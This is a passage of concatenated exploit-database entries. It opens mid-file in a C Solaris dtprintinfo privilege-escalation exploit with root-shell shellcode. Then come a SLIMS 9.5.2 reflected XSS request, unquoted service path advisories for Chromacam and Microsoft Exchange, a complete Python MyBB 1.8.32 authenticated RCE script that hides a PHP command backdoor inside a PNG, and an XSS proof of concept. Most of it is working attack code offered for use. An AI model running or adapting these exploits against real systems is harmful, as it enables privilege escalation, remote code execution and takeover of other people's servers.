Ivaldi <[email protected]>" #define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program #define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging #define BUFSIZE 1106 // size of hostile buffer #define PADDING 1 // hostile buffer padding #define SAFE 0x08045770 // 1st arg to ParseColors() char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */ /* triple setuid() */ "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" /* execve() */ "\x31\xc0\x50\x68/ksh\x68/bin" "\x89\xe3\x50\x53\x89\xe2\x50" "\x52\x53\xb0\x3b\x50\xcd\x91"; /* globals */ char *arg[2] = {"foo", NULL}; char *env[256]; int env_pos = 0, env_len = 0; /* prototypes */ int add_env(char *string); void check_bad(int addr, char *name); int get_env_addr(char *path, char **argv); int search_ldso(char *sym); int search_rwx_mem(void); void set_val(char *buf, int pos, int val); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], cmd[1024], *vuln = VULN; char platform[256], release[256], display[256]; int i, sc_addr, safe_addr = SAFE; FILE *fp; int sb = ((int)argv[0] | 0xfff); // stack base int ret = search_ldso("sprintf"); // sprintf() in ld.so.1 int rwx_mem = search_rwx_mem(); // rwx memory /* helper that prints argv[0] address, used by get_env_addr() */ if (!strcmp(argv[0], arg[0])) { printf("0x%p\n", argv[0]); exit(0); } /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* process command line */ if ((argc < 2) || (argc > 3)) { fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", argv[0]); exit(1); } snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]); if (argc > 2) { safe_addr = (int)strtoul(argv[2], (char **)NULL, 0); } /* enter debug mode */ if (safe_addr == 0x41414141) { unlink(DEBUG); snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG); if (system(cmd) == -1) { perror("error creating debug binary"); exit(1); } vuln = DEBUG; } /* fill envp while keeping padding */ add_env("LPDEST=fnord"); // injected printer add_env("HOME=/tmp"); // home directory add_env("PATH=/usr/bin:/bin"); // path sc_addr = add_env(display); // x11 display add_env(sc); // shellcode add_env(NULL); /* calculate shellcode address */ sc_addr += get_env_addr(vuln, argv); /* inject a fake printer */ unlink("/tmp/.printers"); unlink("/tmp/.printers.new"); if (!(fp = fopen("/tmp/.printers", "w"))) { perror("error injecting a fake printer"); exit(1); } fprintf(fp, "fnord :\n"); fclose(fp); link("/tmp/.printers", "/tmp/.printers.new"); /* craft the hostile buffer */ bzero(buf, sizeof(buf)); for (i = PADDING; i < BUFSIZE - 16; i += 4) { set_val(buf, i, ret); // sprintf() set_val(buf, i += 4, rwx_mem); // saved eip set_val(buf, i += 4, rwx_mem); // 1st arg set_val(buf, i += 4, sc_addr); // 2nd arg } memcpy(buf, "\"c c ", 5); // beginning of hostile buffer buf[912] = ' '; // string separator set_val(buf, 1037, safe_addr); // safe address set_val(buf, 1065, safe_addr); // safe address set_val(buf, 1073, 0xffffffff); // -1 /* create the hostile XPM icon files */ system("rm -fr /tmp/.dt"); mkdir("/tmp/.dt", 0755); mkdir("/tmp/.dt/icons", 0755); if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) { perror("error creating XPM icon files"); exit(1); } fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf); fclose(fp); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm"); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm"); /* print some output */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret); fprintf(stderr, "Path of target binary\t: %s\n\n", vuln); /* check for badchars */ check_bad(safe_addr, "safe address"); check_bad(rwx_mem, "rwx_mem address"); check_bad(sc_addr, "sc address"); check_bad(ret, "sprintf() address"); /* run the vulnerable program */ execve(vuln, arg, env); perror("execve"); exit(0); } /* * add_env(): add a variable to envp and pad if needed */ int add_env(char *string) { int i; /* null termination */ if (!string) { env[env_pos] = NULL; return env_len; } /* add the variable to envp */ env[env_pos] = string; env_len += strlen(string) + 1; env_pos++; /* pad envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_bad(): check an address for the presence of badchars */ void check_bad(int addr, char *name) { int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP for (i = 0; i < sizeof(bad) / sizeof(int); i++) { if (((addr & 0xff) == bad[i]) || ((addr & 0xff00) == bad[i]) || ((addr & 0xff0000) == bad[i]) || ((addr & 0xff000000) == bad[i])) { fprintf(stderr, "error: %s contains a badchar\n", name); exit(1); } } } /* * get_env_addr(): get environment address using a helper program */ int get_env_addr(char *path, char **argv) { char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; char hex[11]; int fd[2], addr; /* truncate program name at correct length and create a hard link */ prog[strlen(path)] = '\0'; unlink(prog); link(argv[0], prog); /* open pipe to read program output */ if (pipe(fd) == -1) { perror("pipe"); exit(1); } switch(fork()) { case -1: /* cannot fork */ perror("fork"); exit(1); case 0: /* child */ dup2(fd[1], 1); close(fd[0]); close(fd[1]); execve(prog, arg, env); perror("execve"); exit(1); default: /* parent */ close(fd[1]); read(fd[0], hex, sizeof(hex)); break; } /* check address */ if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) { fprintf(stderr, "error: cannot read address from helper\n"); exit(1); } return addr + strlen(arg[0]) + 1; } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, O_RDONLY)) < 0) { fprintf(stderr, "can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NUL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; }

## Exploit Title: SLIMSV 9.5.2 - Cross-Site Scripting (XSS) ## Development: nu11secur1ty ## Date: 01.19.2023 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2 ## Description: The value of manual insertion `point 3` is copied into the HTML document as plain text between tags. The payload udz21<script>alert(1)</script>rk346 was submitted in manual insertion point 3. This input was echoed unmodified in the application's response. The attacker can trick the already logged-in user, to visit the exploit link that this attacker is created, and if this already logged-in user is not actually IT or admin, this will be the end of this system. ## STATUS: HIGH Vulnerability [+] Exploit: ``` GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27 HTTP/1.1 Host: pwnedhost1.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1; SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4 Connection: close ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2) ## Proof and Exploit: [href](https://streamable.com/zd6e18) ## Reference: [href](https://portswigger.net/web-security/cross-site-scripting) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path # Exploit Author: Laguin Benjamin (MONK-MODE) # Discovery Date: 2023-19-01 # Vendor Homepage: https://personifyinc.com/ # Software Link: https://personifyinc.com/download/chromacam # Tested Version: Chromacam-4.0.3.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 x64 # CVE: In progress # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Personify Frame Transformer PsyFrameGrabberService C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe Auto C:\>sc qc "PsyFrameGrabberService" [SC] QueryServiceConfig réussite(s) SERVICE_NAME: PsyFrameGrabberService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Personify Frame Transformer DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo Host Name: DESKTOP-1000 OS Name: Microsoft Windows 10 Professionnel OS Version: 10.0.19044 N/A build 19044 # Exploit If an attacker had already compromised the system and the current user has the privileges to write in the : C:\Program Files (x86)\ "C:\Program Files (x86)\Personify" "C:\Program Files (x86)\Personify\ChromaCam" "C:\Program Files (x86)\Personify\ChromaCam\64" folder or in "C:\" , he could place his own "Program.exe" or "PsyFrameGrabberService.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "PsyFrameGrabberService.exe". The service starts automatically at bood and runs in system

# Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2023-01-18 # Vendor : Microsoft # Version : 15.02.1118.007 # Tested on OS: Microsoft Exchange Server 2019 CU12 #PoC : ============== C:\>sc qc MSExchangeADTopology [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeADTopology TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology DIPENDENZE : SERVICE_START_NAME : LocalSystem

# Exploit Title: MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated) # Date: 2023-01-19 # Exploit Author: lUc1f3r11 (https://github.com/FDlucifer) # Vendor Homepage: https://mybb.com/ # Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1832 # Version: MyBB 1.8.32 # Tested on: Linux # CVE : N/A # Detailed Analysis : https://fdlucifer.github.io/2023/01/17/mybb1-8-32-LFI-RCE/ # (1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir. # (2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english. # (3). This chained bugs can lead to Authenticated RCE. # (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32. # # # Exp Usage: # 1.first choose a png file that size less than 1kb # 2.then merge the png file with a php simple backdoor file using the following commands # mac@xxx-2 php-backdoor % cat simple-backdoor.php # <?php # if(isset($_REQUEST['cmd'])){ # echo "<getshell success>"; # $cmd = ($_REQUEST['cmd']); # system($cmd); # echo "<getshell success>"; # phpinfo(); # } # ?> # mac@xxx-2 php-backdoor % ls # simple-backdoor.php test.png # mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png # mac@xxx-2 php-backdoor % file test.png # test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced # 3.finnally run the following commands to run the exp script to get RCE output! enjoy the shell... # python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email [email protected] --file avatar_1.png --cmd "cat /etc/passwd" import requests import argparse from bs4 import BeautifulSoup from requests_toolbelt import MultipartEncoder import re r_clients = requests.Session() def exploit(username, password, email, host, file, cmd): # Adding ./inc upload path settings to bypass avatar upload path blacklists data = { "username" : username, "password" : password, "do" : "login" } login_txt = r_clients.post(host + "/admin/index.php", data=data).text if "The username and password combination you entered is invalid" in login_txt: print("[-] Login failure. Incorrect credentials supplied") exit(0) print("[+] Login successful!") if "Access Denied" in login_txt: print("[-] Supplied user doesn't have the rights to add a setting") exit(0) print("[*] Adding ./inc upload path settings...") soup = BeautifulSoup(login_txt, "lxml") my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value'] print("[+] my_post_key: ", my_post_key) print("[+] cookies: ", r_clients.cookies.get_dict()) cookies = r_clients.cookies.get_dict() data = { "my_post_key" : my_post_key, "gid" : 10, "upsetting[sigmycode]" : 1, "upsetting[sigcountmycode]" : 1, "upsetting[sigsmilies]" : 1, "upsetting[sightml]" : 0, "upsetting[sigimgcode]" : 1, "upsetting[maxsigimages]" : 2, "upsetting[siglength]" : 255, "upsetting[hidesignatures]" : "", "upsetting[hidewebsite]" : "", "upsetting[useravatar]" : "./inc", "upsetting[useravatardims]" : "100x100", "upsetting[useravatarrating]" : 0, "upsetting[maxavatardims]" : "100x100", "upsetting[avatarsize]" : 25, "upsetting[avatarresizing]" : "auto", "upsetting[avataruploadpath]" : "./inc", "upsetting[allowremoteavatars]" : 1, "upsetting[customtitlemaxlength]" : 40, "upsetting[allowaway]" : 1, "upsetting[allowbuddyonly]" : 0 } modify_settings_txt = r_clients.post(host + "/admin/index.php?module=config-settings&action=change",data=data,allow_redirects=False, cookies=cookies) if modify_settings_txt.status_code != 302: soup = BeautifulSoup(modify_settings_txt.text, "lxml") error_txt = soup.find_all("div", {"class" : "error"})[0].text print("[-] modify upload path failed. Reason: '{}'".format(error_txt)) exit(0) print("[+] ./inc upload path settings added!") # upload malicious avatar in admin panel with open("test.png", "rb") as f: image_binary = f.read() print("[+] read image successful! ") print("[+] image contents: ", image_binary) filename = "test.png" data1 = { 'my_post_key': my_post_key, 'username': username, 'email': email, 'avatar_upload': (filename, open(filename, 'rb'), 'image/png') } m = MultipartEncoder(data1) headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": m.content_type, "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1" } upload_url = host + "/admin/index.php?module=user-users&action=edit&uid=1" upload = r_clients.post(upload_url, data=m, allow_redirects=False, headers=headers, cookies=cookies) if upload.status_code != 302: soup = BeautifulSoup(upload.text, "lxml") error_txt = soup.find_all("div", {"class" : "error"})[0].text print("[-] upload avatar didn't work. Reason: '{}'".format(error_txt)) exit(0) print("[+] upload malicious avatar png success!") # commands exec and get the output, we are done finally :) data2 = { 'my_post_key': my_post_key, 'file': file, 'lang': "english", 'editwith': "..", 'inadmin': 0 } exec_url = host + "/admin/index.php?module=config-languages&action=edit&cmd=" + cmd commands_exec = r_clients.post(exec_url, data=data2, cookies=cookies) if commands_exec.status_code != 200: soup = BeautifulSoup(commands_exec.text, "lxml") error_txt = soup.find_all("div", {"class" : "error"})[0].text print("[-] command exec didn't work. Reason: '{}'".format(error_txt)) exit(0) cmd_output = re.findall(r'<getshell success>(.*?)<getshell success>', commands_exec.text, re.S) print("[+] exec status: ", commands_exec.status_code) print("[+] command exec success:\n\n", cmd_output[0].replace("\n", "\n")) parser = argparse.ArgumentParser() parser.add_argument('--username', required=True, help="MyBB Admin CP username") parser.add_argument('--password', required=True, help="MyBB Admin CP password") parser.add_argument('--email', required=True, help="MyBB Admin CP admin's email (easy to find in admin users panal)") parser.add_argument('--file', required=True, help="the image file name in the server that we uploaded before. (easy to find in admin users panal)") parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000") parser.add_argument('--cmd', required=False, help="Command to run") args = parser.parse_args() username = args.username password = args.password email = args.email file = args.file host = args.host cmd = "id" if args.cmd == None else args.cmd print("""_______________________________________\n / MyBB 1.8.32 - Chained LFI Remote Code \ \n \ Execution (RCE) (Authenticated) / \n --------------------------------------- \n \ ^__^ \n \ (oo)\_______ \n (__)\ )\/\ \n ||----w | \n || || \n Author: lUc1f3r11 Github: https://github.com/FDlucifer""") exploit(username, password, email, host, file, cmd)

# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) # Date: 20/01/2023 # Exploit Author: Rahul Patwari # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip # Version: 1.0 # Tested on: XAMPP / Windows 10 # CVE : CVE-2023-23161 # Proof of Concept: # 1- Install The application Art Gallery Management System Project v1.0 # 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints # 3- Now Insert XSS Payload on artname parameter. the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E # 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E # 5- XSS has been triggered. # Go to this url " https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E " XSS will trigger.